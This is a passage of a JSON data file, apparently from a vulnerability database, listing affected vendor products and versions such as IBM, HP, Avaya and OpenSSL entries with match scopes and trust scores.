        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "project openssl i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.2"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1.0"
      },
      {
        "model": "u200a and m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "project openssl 1.0.0i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56003"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "msr20-1x r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "hp-ux b.11.23",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "r1105",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1920"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.0"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "r11xx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19100"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1.2"
      },
      {
        "model": "cognos planning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "tivoli workload scheduler for z/os connector fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2"
      },
      {
        "model": "security virtual server protection for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.0"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "project openssl 1.0.0e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.2"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "project openssl beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "project openssl a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58000"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.5"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.0"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4"
      },
      {
        "model": "project openssl c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.7.3"
      },
      {
        "model": "si switch series r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5500"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1.2"
      },
      {
        "model": "aspera connect server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "z/tpf",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.10"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8x"
      },
      {
        "model": "r2110p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v2-48"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.3.2"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "ps110",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "upward integration modules hardware management pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.3"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.33"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.1"
      },
      {
        "model": "9500e r1828p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.3.0"
      },
      {
        "model": "upward integration modules integrated installer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.3"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "project openssl 0.9.8t",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "f5000-s r3811p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.1.0"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "a6600 russian version r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.3"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.6"
      },
      {
        "model": "switch series (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v7)0"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.7.5"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2.1"
      },
      {
        "model": "project openssl 1.0.0c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "tivoli workload scheduler distributed fp03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "qradar vulnerability manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.0"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.0"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "msr30-16 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "hsr6602",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.1.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.1"
      },
      {
        "model": "msr30-16 russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "msr20-1x russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ra",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "f5000-c r3811p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.4"
      },
      {
        "model": "si switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55000"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.1"
      },
      {
        "model": "rf manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.9.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.6.0"
      },
      {
        "model": "cognos planning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "tivoli workload scheduler for z/os connector fp03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "project openssl 1.0.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "hsr6800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ei switch series r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5120"
      },
      {
        "model": "project openssl d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "tivoli management framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.2"
      },
      {
        "model": "h.07",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "ssl for openvms",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-495"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.1"
      },
      {
        "model": "msr50 g2 russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "sle client tools for s390x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2.2"
      },
      {
        "model": "office connect pm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "project openssl 1.0.0j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "project openssl 1.0.0b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "36100"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "msr30-16",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ya",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "switch series r2311p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5900"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3"
      },
      {
        "model": "bladecenter t advanced management module 32r0835",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.26.2.1.2"
      },
      {
        "model": "hi switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55000"
      },
      {
        "model": "msr30-1x russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3.0"
      },
      {
        "model": "msr30-1x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "lotus protector for mail security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.80"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-471"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "switch series r2110p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3600v2"
      },
      {
        "model": "aura presence services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "12500(comware r7328p04",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v7)"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "aura presence services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.0.1"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.3"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.4"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.5"
      },
      {
        "model": "tivoli workload scheduler distributed fp07",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "w",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "msr30 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "r15xx r1513p95",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1910"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "lotus protector for mail security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.8.1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.7.0"
      },
      {
        "model": "msr4000 r0106p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "msr50 russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl beta3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "project openssl f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "bladecenter -t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8730"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3600v20"
      },
      {
        "model": "cloudbridge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "msr30-1x r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v20"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "version control repository manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "pb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0"
      },
      {
        "model": "tivoli workload scheduler for applications fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.56.5.1.0"
      },
      {
        "model": "msr50 r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "aspera enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5"
      },
      {
        "model": "tivoli workload scheduler distributed fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7989"
      },
      {
        "model": "switch series r6708p10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7500"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.10"
      },
      {
        "model": "g switch series r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4800"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "project openssl beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "f1000-e r3181p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "bladecenter -ht",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8740"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.5"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1.0"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "msr9xx r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "mcp russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66000"
      },
      {
        "model": "4510g switch series r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "r11xx r1107",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1910"
      },
      {
        "model": "wx5002/5004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "msr30-16 r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "msr30-1x russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
